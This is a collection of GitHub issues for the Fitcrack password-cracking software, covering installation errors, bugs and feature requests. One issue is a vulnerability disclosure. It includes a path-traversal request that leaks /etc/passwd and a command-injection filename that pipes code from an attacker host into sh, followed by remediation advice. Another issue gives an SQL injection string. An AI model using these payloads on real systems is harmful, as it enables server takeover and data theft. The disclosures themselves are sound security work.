nesfit / fitcrack Goto Github PK

Looking for general thoughts on where to look next. I've tried installing fircrack over a few different methods and all are coming up to this error.

I've tried the docker version and the installer version on ubuntu server 20 and 22 but all come to the same error. Because at this point i am just trying to get the service up and running, i have changed no defaults within the .env and left with localhost and same for the installer version. No errors when going through the build phase or the installation. When jumping onto the webpage "http://localhost/login" I get the error about the API not being available. When trying to debug via docker instructions, i can confirm that an error page is present on the 5000 port "internal server error" rather than something working. I'm including some of the log snippets here from the apache log that may be relevant.

Also checked service. Fitcrack was inactive when checked but when brought up to be active but no change in behavior of the WebAdmin on 5000.

[Mon Mar 06 20:57:27.872708 2023] [core:notice] [pid 23491] AH00094: Command line: '/usr/sbin/apache2' [Mon Mar 06 20:58:05.931414 2023] [mpm_prefork:notice] [pid 23491] AH00170: caught SIGWINCH, shutting down gracefully [Mon Mar 06 20:58:06.106869 2023] [mpm_prefork:notice] [pid 23627] AH00163: Apache/2.4.52 (Ubuntu) mod_wsgi/4.9.0 Python/3.10 configured -- resuming normal operations [Mon Mar 06 20:58:06.106936 2023] [core:notice] [pid 23627] AH00094: Command line: '/usr/sbin/apache2' [Mon Mar 06 20:58:39.051592 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] mod_wsgi (pid=23628): Failed to exec Python script file '/var/www/html/fitcrackAPI/src/wsgi.py'. [Mon Mar 06 20:58:39.052016 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] mod_wsgi (pid=23628): Exception occurred processing WSGI script '/var/www/html/fitcrackAPI/src/wsgi.py'. [Mon Mar 06 20:58:39.053251 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] Traceback (most recent call last): [Mon Mar 06 20:58:39.053295 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/var/www/html/fitcrackAPI/src/wsgi.py", line 12, in <module> [Mon Mar 06 20:58:39.053303 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] from app import app as application [Mon Mar 06 20:58:39.053310 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/var/www/html/fitcrackAPI/src/app.py", line 16, in <module> [Mon Mar 06 20:58:39.053315 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] from src.api.fitcrack.endpoints.chart.chart import ns as chart_namespace [Mon Mar 06 20:58:39.053322 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/chart/chart.py", line 13, in <module> [Mon Mar 06 20:58:39.053328 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] from src.database import db [Mon Mar 06 20:58:39.053334 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/var/www/html/fitcrackAPI/src/src/database/__init__.py", line 8, in <module> [Mon Mar 06 20:58:39.053340 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] db = SQLAlchemy() [Mon Mar 06 20:58:39.053346 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/usr/local/lib/python3.10/dist-packages/flask_sqlalchemy/__init__.py", line 754, in __init__ [Mon Mar 06 20:58:39.053352 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] _include_sqlalchemy(self, query_class) [Mon Mar 06 20:58:39.053371 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/usr/local/lib/python3.10/dist-packages/flask_sqlalchemy/__init__.py", line 108, in _include_sqlalchemy [Mon Mar 06 20:58:39.053377 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] for key in module.__all__: [Mon Mar 06 20:58:39.053392 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] AttributeError: module 'sqlalchemy' has no attribute '__all__' [Mon Mar 06 20:58:41.082267 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:60056] mod_wsgi (pid=23628): Failed to exec Python script file '/var/www/html/fitcrackAPI/src/wsgi.py'. [Mon Mar 06 20:58:41.082367 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:60056] mod_wsgi (pid=23628): Exception occurred processing WSGI script '/var/www/html/fitcrackAPI/src/wsgi.py'.

BRANCH:DEV
CONFIG:DEFAULT
Ubuntu20.04 x64
I tried to upload a hashlist but it seems the button is missing or am I doing something wrong?

Hi,
I've tried to add an host, everything is fine client side, I can see the confirmation but on server side no hosts are added.
BOINC manager shows the project correctly.

Similar to the issue #36, using ?a?a is causing an issue still. I'm using latest dev version. This was while doing SHA1 hashes
boinc.txt

Hello all,

During some of our testing I have noticed that we are actually completing fragment jobs with the Weakpass 3a dictionary faster than the work generator can actually make the job for clients, is their anything we can do to speed up the work generator? looking at htop and glances it appears that it only uses 1 cpu thread, can this be changed?

Hi, thanks for this software! I'm exploring it as an alternative to Hashtopolis.

I'm wondering if there's functionality to see the current speed of a running task (outside of the benchmark speed in the logs).

Thanks!

According to chromium's code which works with windows pipes too:
https://chromium.googlesource.com/chromium/src/+/master/remoting/host/file_transfer/file_chooser_win.cc

We just need to do small changes to support Async I/O. Proposed changes:
https://pastebin.com/nB0Vb2jL

if (is_NONBLOCK_) {
    DWORD mode = PIPE_NOWAIT;
    if (!SetNamedPipeHandleState(read_, &mode, NULL, NULL)) {
       RunnerUtils::runtimeException("SetNamedPipeHandleState() failed", GetLastError());
    }
  }

@xJurgen

Is there an updated Dependency list for Ubuntu 20.04?
Getting a bunch of mismatches trying to install

Hello, I am struggling to get the latest dev version running, I get the error:

"The server could not verify that you are authorized to access the URL requested...."

The apache error logs show "Invalid JWT error: Invalid header padding"
Python 3.8.10
Flask 2.0.3
Werkzeug 2.0.3

Hi!

We're currently evaluating distributed cracking software for a new password cracking cluster we are building.

We really like almost everything Fitcrack has to offer, however we're running into a massive network bottleneck for dictionary based attacks.

We use 100GB+ dictionaries, and only have 1gbps networking between the 3 nodes. Because of this, we are estimating that the chunking method used by Fitcrack will massively bottleneck our performance, especially for algorithms like NTLM where we might have >500GH/s per node.

Would it be possible to implement an option to store a full copy of the dictionary on every worker, and perform the chunking on the workers, similar to hashtopolis works? This would be a game changer for us and put Fitcrack back on the table as a viable option.

Thanks
🙏

I install fitcrack on Ubuntu 18.04 following this guide https://github.com/nesfit/fitcrack
I can create job on webadmin but when I launch it there is no process.
please give me instructions for this problem
Thanks

We setup fitcrack to test.
how to setup fitcrack with SSL ?

BTW, we got the message as following always when visit installed fitcrack

The server could not verify that you are authorized to access the URL requested. You either supplied the wrong credentials (e.g. a bad password), or your browser doesn't understand how to supply the credentials required.

Hi. I added 2 hosts:

• with 1 GPU (works fine, on UI I can see the GPU info and large keyspace is assigned to it)
• with 10 GPUs (host is added but no GPU info on the webadmin, also quite small keyspace is assigned to it so I guess it can't see these GPUs properly)

Could you please help me why it doesn't work with the second multi-GPU host? Both hosts are added using boinccmd tool.

Due to some requirements I need to deploy Fitcrack on an intranet, without internet. Can you help me?

When running large keyspace across 20+ systems I have noticed that a lot of hosts start producing "computation error" which then stops the job completing

For example i hashed "password" into NTLM, then setup a bruteforce clients start failing at 95% at keyspace 95

The bruteforce was done from 1-8 length special/upper/lower/number (?a) with 3D markov and without markov

The client log says "invalid hex character detected in mask"

Hi, when I try to upload a mask file which contains invalid masks (for example ?:?*?=?)), then Webadmin does not reject this and accepts this file.

The Add Job UI properly rejects this.

Seems the regex here does not properly validate masks.

System details

Fitcrack dev build (f2a0232) on Ubuntu 22.04.2

How to reproduce

1. In Webadmin, go to Library -> Masks
2. Upload a file with an invalid mask like fc_auto_test_mask_invalid_mask.txt
3. The file will be accepted despite containing invalid masks

The code responsible for importing dictionaries from /usr/share/collections/import/ is flawed and contains several vulnerabilities.

File Read

First, the server does not check that files are constrained to /usr/share/collections/import/, allowing files to be read from anywhere on the system.

POSTing the following to /dictionary/fromFile adds a new dictionary with the contents of /etc/passwd on the server

{"files":[{"name":"testpasswd.txt","path":"/etc/passwd"}],"sort":false}

The "dictionary" can then be downloaded from the server, exposing the contents of /etc/passwd:

GET /dictionary/13/download HTTP/2
Host: api.fitcrack.local
Cookie: (omitted)

HTTP/2 200 OK
Cache-Control: no-cache
Content-Disposition: attachment; filename=testpasswd_1654943996.txt
Content-Type: text/plain; charset=utf-8
Date: Sat, 11 Jun 2022 10:40:11 GMT
Etag: "1654928242.4268618-1803-3525252685"
Last-Modified: Sat, 11 Jun 2022 06:17:22 GMT
Server: Caddy
Server: Apache/2.4.37 (rocky) mod_wsgi/4.6.4 Python/3.6
Vary: Cookie
Content-Length: 1803

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync

RCE

The user-supplied filename is not sanitised and is then passed to shell command context.

POSTing the following to /dictionary/fromFile leads to successful exploitation.

{"files":[{"name":"$(curl attackersserver.local|sh)foobar.txt","path":"test"}],"sort":false}

This will pull down code from attackersserver.local and execute it on the Fitcrack server. For example, a reverse shell can be used to take remote control over the server:

This is partially because Popen is used with shell=True, which is not recommended for security reasons.

Recommendations

1. To ensure that files are in an expected directory, use code similar to below:

def is_safe_path(basedir, path, follow_symlinks=True):
    if follow_symlinks:
        matchpath = os.path.realpath(path)
    else:
        matchpath = os.path.abspath(path)
    return basedir == os.path.commonpath((basedir, matchpath))

To prevent RCE, apply all of the following for defence-in-depth:

1. Avoid using shell=True when user-controllable inputs are being passed to the command, unless absolutely necessary.
2. When passing user input to a subprocess command in Python, escape it with shlex.quote.
3. Instead of passing a concatenated shell string, prefer an explicit argv list instead.

Examples
Bad, always vulnerable: subprocess.Popen("./foo -a -b " + userInput, shell=True)
Not vulnerable, but not preferred: subprocess.Popen("./foo -a -b " + shlex.quote(userInput), shell=True)
Best, safe: subprocess.Popen(["./foo", "-a", "-b", userInput])

Let me know if you need any more information.

Thanks,
Lachlan

Hello. I found this issue in tandem with issue #66. When I try to create a dictionary that has an issue, Fitcrack rejects this and shows an error message (as expected). However, when I then try to upload the dictionary (or any dictionary with the same name) again, a "File with name buggy_dict.txt already exists. Path: /usr/share/collections/dictionaries/buggy_dict.txt" error message is shown. Since the original faulty dictionary was only half added to Fitcrack—that is to say that the file exists in /usr/share/collections/dictionaries/ but is not in the database and thus not shown in Webadmin—a dictionary with the same name can never be added again (unless one has access to the server Fitcrack is running on and removes the orphan file).

I identified that the issue stems from this part of code

Concretely, on this line

the uploaded file is saved to /usr/share/collections/dictionaries/ but in the case of any issue with the file, no cleanup of the created file is performed, causing an orphan file to be left behind that causes the described issues.

System details

Fitcrack dev build (f2a0232) on Ubuntu 22.04.2

How to reproduce

1. In Webadmin, go to Library -> Dictionaries
2. Perform a faulty upload (for example the one described in issue #66).
3. The dictionary has not been added to the list of dictionaries as shown in Webadmin
4. Try to upload the dictionary (or any dictionary with the same name) again
5. Webadmin will show a "File with name buggy_dict.txt already exists. Path: /usr/share/collections/dictionaries/buggy_dict.txt"

Hi, when I upload a PCFG ZIP file and then try to download it, the download fails with "An unhandled exception occurred." message.
This doesn't seem to affect anything else: running a cracking test with the newly uploaded PCFG works fine. It seems that only downloading the file back is broken.

This behaviour does not occur when downloading the default PCFGs or PCFGs generated from dictionaries; only PCFGs uploaded directly through Webadmin exhibit this behaviour.

I can see that the code is trying to look for the path stored in the database.

And in the database, the path is stored as the uploaded filename, including the .zip extension (see row 16).

+----+------------------------------------------+----------------------------------------------+------------------+---------------------+---------+
| id | name                                     | path                                         | keyspace         | time_added          | deleted |
+----+------------------------------------------+----------------------------------------------+------------------+---------------------+---------+
|  1 | john                                     | john.zip                                     |       1321431161 | 2019-08-30 12:14:53 |       0 |
|  2 | facebook-pastebay                        | facebook-pastebay.zip                        |              999 | 2019-08-30 12:15:08 |       0 |
|  3 | twitter-banned                           | twitter-banned.zip                           |             1096 | 2019-08-30 12:17:48 |       0 |
|  4 | adobe100                                 | adobe100                                     |              163 | 2023-03-21 17:26:27 |       1 |
|  5 | adobe100                                 | adobe100                                     |              163 | 2023-03-21 17:26:36 |       1 |
|  6 | adobe100                                 | adobe100                                     |              163 | 2023-03-21 17:27:09 |       1 |
|  7 | lmao                                     | lmao                                         |              163 | 2023-03-21 17:29:23 |       1 |
|  8 | lmao                                     | lmao                                         |              163 | 2023-03-21 17:30:27 |       1 |
|  9 | adobe100                                 | adobe100                                     |              163 | 2023-03-23 12:38:55 |       1 |
| 10 | adobe100-crlf                            | adobe100-crlf                                |              163 | 2023-03-23 12:39:03 |       1 |
| 11 | adobe100-crlf                            | adobe100-crlf                                |              163 | 2023-03-23 12:59:09 |       1 |
| 12 | bible                                    | bible                                        |            12570 | 2023-03-23 13:36:01 |       1 |
| 13 | yo_mamma                                 | yo_mamma.zip                                 |              999 | 2023-03-28 11:32:14 |       0 |
| 14 | fc_auto_test_pcfg_correct-20230328125309 | fc_auto_test_pcfg_correct-20230328125309.zip |              999 | 2023-03-28 12:53:51 |       0 |
| 15 | fc_auto_test_pcfg_correct-20230328125754 | fc_auto_test_pcfg_correct-20230328125754.zip |              999 | 2023-03-28 12:59:03 |       0 |
| 16 | fc_auto_test_pcfg_correct-20230328125934 | fc_auto_test_pcfg_correct-20230328125934.zip |              999 | 2023-03-28 13:00:12 |       0 |   <=== This is the newly added PCFG; the path has a .zip extension
| 17 | darkweb2017-top1000                      | darkweb2017-top1000                          | 2924855812155399 | 2023-03-28 14:50:59 |       0 |
+----+------------------------------------------+----------------------------------------------+------------------+---------------------+---------+

But in the /usr/share/collections/pcfg directory (the one the download enpoint refers to), the PCFG is stored as a directory, not a ZIP file.

alpatron@fitcrack:/usr/share/collections/pcfg$ ls -l
total 100
drwxr-xr-x 10 www-data www-data  4096 Mar 28 14:50 darkweb2017-top1000
drwxrwxrwx 10 www-data www-data  4096 Aug 30  2019 facebook-pastebay
-rwxrwxrwx  1 www-data www-data 12300 Aug 30  2019 facebook-pastebay.zip
drwxr-xr-x 10 www-data www-data  4096 Mar 28 12:53 fc_auto_test_pcfg_correct-20230328125309
drwxr-xr-x 10 www-data www-data  4096 Mar 28 12:59 fc_auto_test_pcfg_correct-20230328125754
drwxr-xr-x 10 www-data www-data  4096 Mar 28 13:00 fc_auto_test_pcfg_correct-20230328125934  <=== Uploaded PCFG is stored as directory
drwxr-xr-x 11 www-data www-data  4096 Mar 23 13:49 honeynet
drwxr-xr-x  2 www-data www-data  4096 Mar 28 12:46 image
drwxrwxrwx 10 www-data www-data  4096 Aug 30  2019 john
-rwxrwxrwx  1 www-data www-data 28695 Aug 30  2019 john.zip
drwxrwxrwx 10 www-data www-data  4096 Aug 30  2019 twitter-banned
-rwxrwxrwx  1 www-data www-data 11251 Aug 30  2019 twitter-banned.zip
drwxr-xr-x 10 www-data www-data  4096 Mar 28 11:32 yo_mamma

This mismatch causes the failure of the download endpoint.
Curiously, as I said before, this does not affect cracking jobs; they work just fine even with the database–directory mismatch.

System details

Fitcrack dev build (f2a0232) on Ubuntu 22.04.2

How to reproduce

1. In Webadmin, go to Library -> PCFG
2. Click "Add New"
3. Upload a PCFG ZIP file
4. Try to download the uploaded PCFG
5. Get a blank site saying {"message": "An unhandled exception occurred."}

Error log

[Tue Mar 28 14:53:19.620925 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] An unhandled exception occurred.
[Tue Mar 28 14:53:19.621001 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] Traceback (most recent call last):
[Tue Mar 28 14:53:19.621020 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Tue Mar 28 14:53:19.621039 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     rv = self.dispatch_request()
[Tue Mar 28 14:53:19.621056 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Tue Mar 28 14:53:19.621075 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Tue Mar 28 14:53:19.621093 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Tue Mar 28 14:53:19.621112 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     resp = resource(*args, **kwargs)
[Tue Mar 28 14:53:19.621128 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Tue Mar 28 14:53:19.621146 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Tue Mar 28 14:53:19.621165 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Tue Mar 28 14:53:19.621184 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     resp = meth(*args, **kwargs)
[Tue Mar 28 14:53:19.621200 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/pcfg.py", line 66, in get
[Tue Mar 28 14:53:19.621219 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     return send_file(path, attachment_filename=pcfg.path, as_attachment=True)
[Tue Mar 28 14:53:19.621238 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/usr/local/lib/python3.10/dist-packages/flask/helpers.py", line 612, in send_file
[Tue Mar 28 14:53:19.621257 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     return werkzeug.utils.send_file(
[Tue Mar 28 14:53:19.621273 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/usr/local/lib/python3.10/dist-packages/werkzeug/utils.py", line 701, in send_file
[Tue Mar 28 14:53:19.621324 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     stat = os.stat(path)
[Tue Mar 28 14:53:19.621342 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] FileNotFoundError: [Errno 2] No such file or directory: '/usr/share/collections/pcfg/fc_auto_test_pcfg_correct-20230328125934.zip'
[Tue Mar 28 14:53:19.622935 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] [2023-03-28 14:53:19,621] ERROR in app: Exception on /pcfg/16 [GET]
[Tue Mar 28 14:53:19.622984 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] Traceback (most recent call last):
[Tue Mar 28 14:53:19.623002 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Tue Mar 28 14:53:19.623021 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     rv = self.dispatch_request()
[Tue Mar 28 14:53:19.623037 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Tue Mar 28 14:53:19.623055 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Tue Mar 28 14:53:19.623073 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Tue Mar 28 14:53:19.623091 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     resp = resource(*args, **kwargs)
[Tue Mar 28 14:53:19.623107 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Tue Mar 28 14:53:19.623125 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Tue Mar 28 14:53:19.623143 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Tue Mar 28 14:53:19.623161 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     resp = meth(*args, **kwargs)
[Tue Mar 28 14:53:19.623177 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/pcfg.py", line 66, in get
[Tue Mar 28 14:53:19.623195 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     return send_file(path, attachment_filename=pcfg.path, as_attachment=True)
[Tue Mar 28 14:53:19.623213 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/usr/local/lib/python3.10/dist-packages/flask/helpers.py", line 612, in send_file
[Tue Mar 28 14:53:19.623231 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     return werkzeug.utils.send_file(
[Tue Mar 28 14:53:19.623247 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]   File "/usr/local/lib/python3.10/dist-packages/werkzeug/utils.py", line 701, in send_file
[Tue Mar 28 14:53:19.623265 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150]     stat = os.stat(path)
[Tue Mar 28 14:53:19.623281 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] FileNotFoundError: [Errno 2] No such file or directory: '/usr/share/collections/pcfg/fc_auto_test_pcfg_correct-20230328125934.zip'

Hey there,

Cool project, but I can't get it to compile correctly. I answered the configuration questions and started compiling the server.
It says: error: ‘BOINC_MAJOR_VERSION’ was not declared in this scope; did you mean ‘ERR_MAJOR_VERSION’?

For context:

sched_types.cpp: In constructor ‘SCHEDULER_REPLY::SCHEDULER_REPLY()’:
sched_types.cpp:737:11: warning: ‘void* memset(void*, int, size_t)’ clearing an object of type ‘struct HOST’ with no trivial copy-assignment; use assignment or value-initialization instead [-Wclass-memaccess]
  737 |     memset(&host, 0, sizeof(host));
      |     ~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~
In file included from ../db/boinc_db.h:40,
                 from config.h:24,
                 from sched_types.cpp:20:
../db/boinc_db_types.h:264:8: note: ‘struct HOST’ declared here
  264 | struct HOST {
      |        ^~~~
sched_types.cpp: In member function ‘int SCHEDULER_REPLY::write(FILE*, SCHEDULER_REQUEST&)’:
sched_types.cpp:769:9: error: ‘BOINC_MAJOR_VERSION’ was not declared in this scope; did you mean ‘ERR_MAJOR_VERSION’?
  769 |         BOINC_MAJOR_VERSION*100+BOINC_MINOR_VERSION
      |         ^~~~~~~~~~~~~~~~~~~
      |         ERR_MAJOR_VERSION
sched_types.cpp:769:33: error: ‘BOINC_MINOR_VERSION’ was not declared in this scope; did you mean ‘ERR_MAJOR_VERSION’?
  769 |         BOINC_MAJOR_VERSION*100+BOINC_MINOR_VERSION
      |                                 ^~~~~~~~~~~~~~~~~~~
      |                                 ERR_MAJOR_VERSION
sched_types.cpp: In member function ‘int SCHED_DB_RESULT::parse_from_client(XML_PARSER&)’:
sched_types.cpp:1295:11: warning: ‘void* memset(void*, int, size_t)’ clearing an object of type ‘struct SCHED_DB_RESULT’ with no trivial copy-assignment; use assignment or value-initialization instead [-Wclass-memaccess]
 1295 |     memset(this, 0, sizeof(*this));
      |     ~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~
In file included from sched_main.h:21,
                 from sched_types.cpp:33:
sched_types.h:198:8: note: ‘struct SCHED_DB_RESULT’ declared here
  198 | struct SCHED_DB_RESULT : DB_RESULT {
      |        ^~~~~~~~~~~~~~~
make[2]: *** [Makefile:2571: sched_types.o] Error 1
make[2]: Leaving directory '~/tools/fitcrack/boinc/sched'
make[1]: *** [Makefile:680: all-recursive] Error 1
make[1]: Leaving directory '~/tools/fitcrack/boinc'
make: *** [Makefile:584: all] Error 2
Error during compilation.

Hello, first of all thanks for the great project!

I installed everything under ubuntu 18.04 without an error message.
When I call up 127.0.0.1 to start Fitcrack, the red message "Network Error" appears.
What can be the problem?
Thanks HG

Hi there,
I have successfully installed fitcrack with no error on my ubuntu 22 server following the providing guide in github.

I can't login in webadmin with default credentials. I have checked the config file of frontend. everything seems to be ok so i don t undestand what i missed !

Hi!

Another feature I didn't see, is it possible to enable or disable an agent from the admin page without going to each machine running the BOiNC client? AKA stop it from tasking if there is any available or if it is assigned to one.

Hi. If I try to add a Markov file or a mask set with a filename that was used in the past but has since been deleted¹, the upload fails with a "File with name test_add.hcmask already exists. Path: /usr/share/collections/masks/test_add.hcmask" error. This behaviour only happens with Markov files and mask sets; other resource files in the Library tab (dictionaries, PCFGs, rules, and charsets) do not exhibit this behaviour.

From what I can see, the problem happens because the code for the delete API endpoints does not remove the actual file.

Code for the delete endpoints that do not exhibit this problem does perform a file-deletion operation. Like here in the charset endpoint.

If there is no reason for keeping the resource files after deleting them, I expect to be able to reuse filenames without issue. If there is a reason for this behaviour, I expect this to be documented and a more graceful error message to appear.

Given the former is probably the case and that the issue is probably caused by forgetting to add the file-deletion code, I also opened a pull request (#69) that should fix this issue if it really is that simple.

System details

Fitcrack dev build (f2a0232) on Ubuntu 22.04.2

How to reproduce

1. In Webadmin, go to Library -> Masks or go to Library -> Markov Chains
2. Upload a mask or Markov-chain file
3. Delete it
4. Try to reupload the same file
5. Get a "File with name test_add.hcmask already exists. Path: /usr/share/collections/masks/test_add.hcmask" or similar error.

Hi,

On one of my test workstations, the integrated intel graphics reports utilization and temperature of -1. This causes the trickler process to die, as it appears to overflow to 2^64-1 when the database query is made, causing the database query to fail and the program to exit.

[2022/06/11 09:31:19] Executing command: trickler --variety fitcrack
2022-06-11 09:31:19.7255  Starting trickle handler
2022-06-11 09:31:19.7269  Got trickle-up message from hostId #2:

      <result_name>fitcrack_1654952461_0_6506_1654952782_0</result_name>
      <time>1654952843</time>
<workunit_name>fitcrack_1654952461_0</workunit_name>
<progress>0</progress>
<total_speed>5030128</total_speed>
<device_1_name>NVIDIA GeForce GTX 1080 Ti</device_1_name>
<device_1_type>GPU</device_1_type>
<device_1_speed>2644704</device_1_speed>
<device_1_temp>57</device_1_temp>
<device_1_util>2</device_1_util>
<device_3_name>Radeon RX 580 Series</device_3_name>
<device_3_type>GPU</device_3_type>
<device_3_speed>2206843</device_3_speed>
<device_3_temp>34</device_3_temp>
<device_3_util>0</device_3_util>
<device_4_name>Intel(R) UHD Graphics 630</device_4_name>
<device_4_type>GPU</device_4_type>
<device_4_speed>178581</device_4_speed>
<device_4_temp>-1</device_4_temp>
<device_4_util>-1</device_4_util>

Succesfully parsed workunit_name: fitcrack_1654952461_0
fc_workunit_id: 0
Succesfully parsed progress: 0
Succesfully parsed total speed: 5030128
Updating workunit progress...
Updating workunit speed...
 fc_device_id 1
Inserting data to fc_device_info...
 fc_device_id 2
Inserting data to fc_device_info...
 fc_device_id 3
Inserting data to fc_device_info...
Database error: Out of range value for column 'temperature' at row 1
query=INSERT INTO `fc_device_info` (`device_id`,`workunit_id`,`speed`,`temperature`,`utilization`) VALUES (3, 0, 178581, 18446744073709551615, 18446744073709551615);
Problem with DB query: INSERT INTO `fc_device_info` (`device_id`,`workunit_id`,`speed`,`temperature`,`utilization`) VALUES (3, 0, 178581, 18446744073709551615, 18446744073709551615);
Shutting down now.

These database columns seem to just be signed 32-bit integers, so I think adjusting some types is all that will be necessary to correct this fault.

However, a lot of this code appears like it may be unsafe and possibly vulnerable to SQL injection, for example:

If a host maliciously reports itself with the name foo', ''); ANOTHER_SQL_QUERY_HERE; -- it may be able to perform arbitrary SQL commands against the SQL server leading to security issues.

I would suggest killing two birds with one stone and re-writing some of this to use prepared statements, as these provide more type safety, as well as prevent SQL injection attacks. (https://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html, https://dev.mysql.com/doc/c-api/8.0/en/c-api-prepared-statement-interface.html, https://mariadb.com/kb/en/prepared-statement-examples/).

I would offer to help, however unfortunately neither C++ nor SQL are my strong suits :(.

Hi,
when I try to start the daemons with the ./bin/start this happens:
root@ariel:/home/boincadm/projects/fitcrack# ./bin/start
Entering ENABLED mode
Starting daemons
No daemons for this host found - check host name in config.xml

I tried to modify the config.xml label:
localhost

to:

ariel.badnet.it

But nothing happens. The hostname on which Fitcrack is installed is https://ariel.badnet.it.

What am I doing wrong?

EDIT: solved putting only "ariel" in the host label

`root@docker:/home/user/fitcrack# docker-compose up
Building fitcrack_server
Sending build context to Docker daemon 825.3MB
Step 1/76 : FROM ubuntu:22.04
---> 6b7dfa7e8fdb
Step 2/76 : LABEL maintainer="Fitcrack Team [email protected]"
---> Using cache
---> 3af83d4ff726
Step 3/76 : USER root
---> Using cache
---> 8a2b62b63b2b
Step 4/76 : WORKDIR /tmp
---> Using cache
---> c2800d073598
Step 5/76 : ARG COMPILER_THREADS
---> Using cache
---> 50db945765b5
Step 6/76 : RUN apt-get -y update && apt install -yq curl wget vim
---> Using cache
---> ccfe41289d4b
Step 7/76 : RUN apt install -y iputils-ping
---> Using cache
---> 09feeab383db
Step 8/76 : RUN apt install -y net-tools && apt install -y telnet
---> Using cache
---> 3ce2707de3f7
Step 9/76 : ENV TZ UTC
---> Using cache
---> 5603cf9c80ed
Step 10/76 : RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone
---> Using cache
---> 13cd9aec1cdc
Step 11/76 : RUN apt install -yq sudo
---> Using cache
---> d5112f5ea0c1
Step 12/76 : COPY ./tools/keyboard /etc/default/keyboard
---> Using cache
---> 277ae12b0533
Step 13/76 : RUN export DEBIAN_FRONTEND=noninteractive
---> Using cache
---> c8d916658258
